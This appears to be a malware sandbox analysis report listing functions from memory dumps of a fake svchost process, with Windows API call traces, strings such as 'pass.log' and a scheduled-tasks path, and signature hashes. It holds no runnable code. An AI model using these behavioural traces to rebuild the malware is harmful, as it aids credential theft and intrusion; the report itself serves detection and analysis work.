WriteFile.KERNEL32(00000000,[+@,?,00000000,00000000,?,?,00402B5B,00000000), ref: 00401045
SetEndOfFile.KERNEL32(00000000,?,?,00402B5B,00000000), ref: 00401050
GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040106F
CloseHandle.KERNEL32(00000000), ref: 00401080

Strings

[+@, xrefs: 00401037, 00401040

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$Handle$CloseCreateInformationWrite
String ID: [+@
API String ID: 1150544999-2667881658
Opcode ID: 21b66d7867ddfbefa27aaeae67b762b005cc489ba47700022ac87a39cc13ab03
Instruction ID: c834b12cbe40c0e9b10b40bca9c4cb852a2dca9cf30c5b09766062945076e325
Opcode Fuzzy Hash: 21b66d7867ddfbefa27aaeae67b762b005cc489ba47700022ac87a39cc13ab03
Instruction Fuzzy Hash: 0311E971600244B7E7205B65DD08FAB765DDBC1790F048236FF84F62E0D7758D8082B8

Function 004033A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
CloseHandle.KERNEL32(00000000), ref: 00403427

Strings

\\?\globalroot\systemroot\system32\tasks\, xrefs: 004033A9

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
String ID: \\?\globalroot\systemroot\system32\tasks\
API String ID: 4133869067-1576788796
Opcode ID: 645d9aa35765d8fa00b4ca3d9b4e73897e66a258ba203d8b6412706febb71317
Instruction ID: 021f6ab0fc676138f4263539a703c8a5ee641fdd4e06072bb68a67a5c5d36617
Opcode Fuzzy Hash: 645d9aa35765d8fa00b4ca3d9b4e73897e66a258ba203d8b6412706febb71317
Instruction Fuzzy Hash: 4E0188B5E00208EBEB20CFA0DD09B9A7BBCAB85701F4040A5E709B6280D6749F44CF75

Function 02C883B0 Relevance: 10.5, APIs: 7, Instructions: 43networkthreadCOMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000001), ref: 02C883CB
shutdown.WS2_32(02C884AC,00000001), ref: 02C883D0
recv.WS2_32(02C884AC,?,00000400,00000000), ref: 02C883EF
recv.WS2_32(?,?,00000400,00000000), ref: 02C88405
closesocket.WS2_32(?), ref: 02C88419
closesocket.WS2_32(02C884AC), ref: 02C8841C
ExitThread.KERNEL32 ref: 02C88420

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: closesocketrecvshutdown$ExitThread
String ID:
API String ID: 1638183600-0
Opcode ID: db002666e193d67a4fa707397537c28dadfaec4b9e9a6e682c755636d7f6cf5f
Instruction ID: 050308a56ae31777cf988864614140b0bd900212560c140347662cfed291bd14
Opcode Fuzzy Hash: db002666e193d67a4fa707397537c28dadfaec4b9e9a6e682c755636d7f6cf5f
Instruction Fuzzy Hash: 85F031B29503187BD720AA65CC85F9B3B6CAB88B94F004644BB09BB180D6B4F941CEE4

Function 02C89130 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,00000000,02C89113,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8913C
GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89146
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8914D
memset.MSVCRT ref: 02C8915E
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C891AA

Strings

P0#v, xrefs: 02C891AA

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocMutexObjectProcessReleaseSingleWaitmemset
String ID: P0#v
API String ID: 819421891-3387790918
Opcode ID: bf17576b4b3f9974584de17eb10b964acc128a6fc0dcc4f49bd0e869d17f9889
Instruction ID: e6f4492e7aabcac417ad51598b3df8eae1fa1d9cfa0e8139636ceb90c3e03de5
Opcode Fuzzy Hash: bf17576b4b3f9974584de17eb10b964acc128a6fc0dcc4f49bd0e869d17f9889
Instruction Fuzzy Hash: 9E01F3B0E81B11AFC32ACF28E844B46FBF4BF48710F048A5AE55A87780D730B950CB90

Function 02C9C97A Relevance: 9.1, APIs: 6, Instructions: 141fileCOMMON

Download Yara Rule

APIs

free.MSVCRT ref: 02C9C81F
MoveFileA.KERNEL32(?,?), ref: 02C9CA0D
GetFileAttributesA.KERNEL32(?), ref: 02C9CA51
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C9CAC3

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateDirectoryMovefree
String ID:
API String ID: 1026147201-0
Opcode ID: 6d56f136752f8de2cf715215aaabbe1badd567b4ca862488b421c707f727fe41
Instruction ID: 6fbb9ba311c2d486b087baf120766f527d6bb41bf08a3a80a0ff45588bae05d7
Opcode Fuzzy Hash: 6d56f136752f8de2cf715215aaabbe1badd567b4ca862488b421c707f727fe41
Instruction Fuzzy Hash: D4413831A4429A8FDF21CF7888987F97FA49F9A344F1445EAE582CB245DB309705CBA1

Function 02C880E0 Relevance: 9.1, APIs: 6, Instructions: 106networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 02C8810E
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C8813F
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C8816B
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C88192
IsBadReadPtr.KERNEL32(?,00000004), ref: 02C881B4
WSASetLastError.WS2_32(?), ref: 02C881DE

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast$Read
String ID:
API String ID: 2835504744-0
Opcode ID: c5fd1cbb214b15cdab6ce06d29a125c76e6a7ede30152256b383716933324556
Instruction ID: e7fe724f489af6321f71dceae56ef92282b7923a0bf88af3b1335e520fe97cb7
Opcode Fuzzy Hash: c5fd1cbb214b15cdab6ce06d29a125c76e6a7ede30152256b383716933324556
Instruction Fuzzy Hash: 6F41CAB1E0020DAFDB40DFA9D985AAEBBF9EF48304F518569E905E7200E7749A41CF90

Function 02C9F1E0 Relevance: 9.1, APIs: 6, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 02C9F540: htons.WS2_32(?), ref: 02C9F564
Part of subcall function 02C9F540: inet_addr.WS2_32(?), ref: 02C9F56F
Part of subcall function 02C9F540: htonl.WS2_32(000000FF), ref: 02C9F57A
Part of subcall function 02C9F540: gethostbyname.WS2_32(?), ref: 02C9F586
Part of subcall function 02C9F540: socket.WS2_32(00000002,00000001,00000000), ref: 02C9F5A0
Part of subcall function 02C9F540: connect.WS2_32(00000000,?,00000010), ref: 02C9F5B3
Part of subcall function 02C9F540: closesocket.WS2_32(00000000), ref: 02C9F5BE

setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02C9F21F
closesocket.WS2_32 ref: 02C9F234

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: closesocket$connectgethostbynamehtonlhtonsinet_addrsetsockoptsocket
String ID:
API String ID: 2706992148-0
Opcode ID: 53adfa6ea3cf7b33249b95afa0770064adb70ff08dbdb1e7d2fb769282cd73ba
Instruction ID: cc431ba2af91e8e9b9009b5b2c384af590350d5debc5c8f42bee17bc6d3df787
Opcode Fuzzy Hash: 53adfa6ea3cf7b33249b95afa0770064adb70ff08dbdb1e7d2fb769282cd73ba
Instruction Fuzzy Hash: 2A310A75A40615BBDB10CFA8E84DBEAB7A8FF05710F20825AF515C7180EB719A54CBE1

Function 02C79030 Relevance: 9.1, APIs: 6, Instructions: 88COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 02C79057
IsRectEmpty.USER32(?), ref: 02C790C6
GetWindowLongA.USER32(?,000000F0), ref: 02C790D6
GetParent.USER32(?), ref: 02C790EA
MapWindowPoints.USER32(00000000,00000000,?,02C79754), ref: 02C790F3
SetWindowPos.USER32(?,00000000,?,02C79754,00000000,00008001,0000630C,?,02C79754,00000000,00008001,?), ref: 02C79115

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Rect$EmptyLongParentPoints
String ID:
API String ID: 379166938-0
Opcode ID: 374e363667ad26d19e2a5c50ec631439f3f6d0eb4c8d02660777ea6d35d9f735
Instruction ID: 4e9a8a0b1bcc44802f0ea67f31edd1616058c903fd7bc8432f77e8a2b9c7038a
Opcode Fuzzy Hash: 374e363667ad26d19e2a5c50ec631439f3f6d0eb4c8d02660777ea6d35d9f735
Instruction Fuzzy Hash: 5F313071E40219EFDB01CFA9D949AFEBBB8FF49710F104699E445A7240D7B09A10CBA1

Function 02C72860 Relevance: 9.1, APIs: 6, Instructions: 87COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 02C7287F
exit.MSVCRT ref: 02C7288D
calloc.MSVCRT ref: 02C72899
exit.MSVCRT ref: 02C728A6
free.MSVCRT ref: 02C728FA
free.MSVCRT ref: 02C7291E

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: callocexitfree
String ID:
API String ID: 3367576030-0
Opcode ID: 64cf0029b2f039a47c8f44471105e99cfb02d11d2272fc1700fe2650d6133c84
Instruction ID: 969ca29441430a44ae7d068f8bd1570233bf6ff43ec5cf71020b18c90718a8d7
Opcode Fuzzy Hash: 64cf0029b2f039a47c8f44471105e99cfb02d11d2272fc1700fe2650d6133c84
Instruction Fuzzy Hash: 64213DB6A00359AFDB11CF58DC81BAB77A8FF88310F044569ED4597340D772EE108BA2

Function 02C81AC0 Relevance: 9.1, APIs: 6, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02C81ACE
GetWindowTextA.USER32(00000000,?,00000104), ref: 02C81AE9

Part of subcall function 02C81330: memset.MSVCRT ref: 02C81347
Part of subcall function 02C81330: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7622F550,00000000), ref: 02C8135E
Part of subcall function 02C81330: PathAddBackslashA.SHLWAPI(?,?,7622F550,00000000), ref: 02C8136B
Part of subcall function 02C81330: PathFileExistsA.SHLWAPI(?,?,7622F550,00000000), ref: 02C813A7
Part of subcall function 02C81330: lstrcpynA.KERNEL32(02CC7C28,00000000,00000104,00000000,00000001,?,7622F550,00000000), ref: 02C813D1
Part of subcall function 02C81330: GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813E0
Part of subcall function 02C81330: HeapValidate.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813E3
Part of subcall function 02C81330: GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813F0
Part of subcall function 02C81330: HeapFree.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813F3

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B47
HeapValidate.KERNEL32(00000000), ref: 02C81B4A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B57
HeapFree.KERNEL32(00000000), ref: 02C81B5A

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Path$FreeValidate$AncestorBackslashExistsFileFolderTextWindowlstrcpynmemset
String ID:
API String ID: 649337724-0
Opcode ID: 1d786c4ce8f3e7b9c375caa0773c66e8652aa73733a14f89ed2191edea3b9b28
Instruction ID: 26e08be0b0e164c66fd54795b2ce944ec44a80d45b1e8e4f516e699ee8a2f7d6
Opcode Fuzzy Hash: 1d786c4ce8f3e7b9c375caa0773c66e8652aa73733a14f89ed2191edea3b9b28
Instruction Fuzzy Hash: 9611C8B1E4425457DB206B349C18FF33BE89B91358F088A94E88C87180FBB0D95ACB60

Function 02C89B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82C3182D), ref: 02C89B47
GetFileAttributesA.KERNEL32(?), ref: 02C89B85
PathFileExistsA.SHLWAPI(?), ref: 02C89BC9

Strings

82C3182D, xrefs: 02C89B42, 02C89B4D
pass.log, xrefs: 02C89BA8

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: FilePath$AttributesBackslashExists
String ID: 82C3182D$pass.log
API String ID: 2713433229-516074972
Opcode ID: 78619ef695ab782b7263028e11ce17cc6bd4f0f8d27fa45550990d259e2171eb
Instruction ID: dd6b5d5ff430268dd9c764518b0ef113d75c22a133e28c216694d89d03cf3145
Opcode Fuzzy Hash: 78619ef695ab782b7263028e11ce17cc6bd4f0f8d27fa45550990d259e2171eb
Instruction Fuzzy Hash: 691127319046484BD7229B28A8A47F7BBE4EFC6301F14C6E4ECCAD7301EA30DA59C780

Function 02C862E0 Relevance: 8.8, APIs: 7, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02C92F00: OpenProcess.KERNEL32(00000000,00001400,00000000,00000000,7734FFB0,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F2C
Part of subcall function 02C92F00: GetProcessTimes.KERNEL32(00000000,02C86436,?,?,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F4A
Part of subcall function 02C92F00: GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F68
Part of subcall function 02C92F00: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F79

EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000,00000000,02C865A8), ref: 02C862F9
LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86315
GetProcessHeap.KERNEL32(00000000,0872D5E8), ref: 02C8633A
HeapValidate.KERNEL32(00000000), ref: 02C8633D
GetProcessHeap.KERNEL32(00000000,0872D5E8), ref: 02C8634A
HeapFree.KERNEL32(00000000), ref: 02C8634D
LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86358

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
String ID:
API String ID: 3901171168-0
Opcode ID: 26c6d85392eb8c4a16e942620162100858da66d781d82b7ac1ffba0ce0e35a5f
Instruction ID: e16848d6b56a16331ab7f53f00c9a1bda535184f7d0ec46107e6b32ba09f805d
Opcode Fuzzy Hash: 26c6d85392eb8c4a16e942620162100858da66d781d82b7ac1ffba0ce0e35a5f
Instruction Fuzzy Hash: 8D01D832F44310A7DB217FA6F848B5A779CDFC4B56F244969E646C7240C7715414CBD0

Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040135A
GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373

Strings

ntdll.dll, xrefs: 00401362
RtlUniform, xrefs: 0040136D

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll
API String ID: 1545651562-3277137149
Opcode ID: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
Instruction ID: 796e466c09054be0152a46d456eb4211c9760dde1472f6724dae78271da73244
Opcode Fuzzy Hash: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
Instruction Fuzzy Hash: E80126712003045BC314AB6AAC81696B7DEAB84706341413BEE05F36A2C23AD8048BAC

Function 004012A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004012AB
GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC

Strings

ntdll.dll, xrefs: 004012B7
RtlUniform, xrefs: 004012C6

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll
API String ID: 1545651562-3277137149
Opcode ID: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
Instruction ID: b56d10f3903839679d055e287fe873ff32dc311f96dddc7098b711b9a384a0cf
Opcode Fuzzy Hash: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
Instruction Fuzzy Hash: 65E04FB07413045BD714BFB6AD09A1637DD9BC47073968036BB09F21E1DA39C814CA6D

Function 02C9A8B0 Relevance: 7.7, APIs: 5, Instructions: 239COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02C9A909

Part of subcall function 02C9F0F0: __WSAFDIsSet.WS2_32(?,?), ref: 02C9F1A0
Part of subcall function 02C9F0F0: closesocket.WS2_32(?), ref: 02C9F1BD

realloc.MSVCRT ref: 02C9A915
malloc.MSVCRT ref: 02C9A94D
realloc.MSVCRT ref: 02C9A959
malloc.MSVCRT ref: 02C9A9AC

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: malloc$realloc$closesocket
String ID:
API String ID: 3133911991-0
Opcode ID: 0356a3c1231401b6a7be1d7f5de1c8159a5ac392767ba78456acf3909ac10746
Instruction ID: 234d781074eed9ee82bdb69a372c02d58ebd33085692b2bbe08d611481305c46
Opcode Fuzzy Hash: 0356a3c1231401b6a7be1d7f5de1c8159a5ac392767ba78456acf3909ac10746
Instruction Fuzzy Hash: BD91B471E006468FCF04CF69DD94BEA37A6FF84305F1985B9ED099B346D634AA11CBA0

Function 02C83070 Relevance: 7.6, APIs: 5, Instructions: 111COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02C83079
VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830AC
VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830D8
VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830FF
SetLastError.KERNEL32(?), ref: 02C8317D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: fff302ee3b30c264ee0b45909c7ee0650ba2af0419d9d1cd90c9113fc6f59942
Instruction ID: c22fec3debad68109ae53af3713d6f3bc022abe314a829566c38cd502efa383c
Opcode Fuzzy Hash: fff302ee3b30c264ee0b45909c7ee0650ba2af0419d9d1cd90c9113fc6f59942
Instruction Fuzzy Hash: 6C410070D002589FDB10DFA8DC84ABEBBF5EB49B14F14856AE854E7300D7749A41CF90

Function 02C713C0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02C713EE
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7142A
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C71456
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7147D
SetLastError.KERNEL32(?), ref: 02C714A8

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: 2384ea9097a833b24d5b8108a4602d841b8cc338c89f456d74cb20a2ae7ef3d8
Instruction ID: 1d0cbe58a42e6112b8ddfa8b43695c8949b580d3d940c60503325a504768526f
Opcode Fuzzy Hash: 2384ea9097a833b24d5b8108a4602d841b8cc338c89f456d74cb20a2ae7ef3d8
Instruction Fuzzy Hash: C531BFB1D10209AFDB40DFA8D885AEE7BF9FB4C310F11856AE919E7240E37499418F90

Function 02C881F0 Relevance: 7.6, APIs: 5, Instructions: 89networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 02C88212
VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C88243
VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C8826F
VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C88296
WSASetLastError.WS2_32(?), ref: 02C882C9

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: b819b516573bc4f912785a3247e2323c5e7f75cb7350b74a62e991f6c2d5373a
Instruction ID: 06586e1eaa10fa555cb0fbba212fe2088047078a4de0b2aeeb16aef29d23f064
Opcode Fuzzy Hash: b819b516573bc4f912785a3247e2323c5e7f75cb7350b74a62e991f6c2d5373a
Instruction Fuzzy Hash: 6B31B8B5D0020CAFDB40DFA9D984AEEBBF5FB48304F11856AE914E7200E7749A40CFA1

Function 02C718C0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02C718FF
free.MSVCRT ref: 02C71928
exit.MSVCRT ref: 02C71933
memcpy.MSVCRT(00000000,02C75DF9), ref: 02C71943
free.MSVCRT ref: 02C71963

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: free$exitmallocmemcpy
String ID:
API String ID: 2377537114-0
Opcode ID: 8395759df2680560837155c9172614cfa67c7f3d6aaca21d69cc930b074bc6fd
Instruction ID: c08f22b8a041d20cf0afc80c082c48cf2a026f55f6d974c7d19bec6c713f0404
Opcode Fuzzy Hash: 8395759df2680560837155c9172614cfa67c7f3d6aaca21d69cc930b074bc6fd
Instruction Fuzzy Hash: E52190B1A0024AAFC714CF59E480B6ABBF5FF89304F14892CD98EC7300E771A661CB85

Function 02C76189 Relevance: 7.6, APIs: 5, Instructions: 54memoryregistrystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C761EA
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C761F1
memset.MSVCRT ref: 02C76205
lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C7621E
RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C7622C

Memory Dump Source

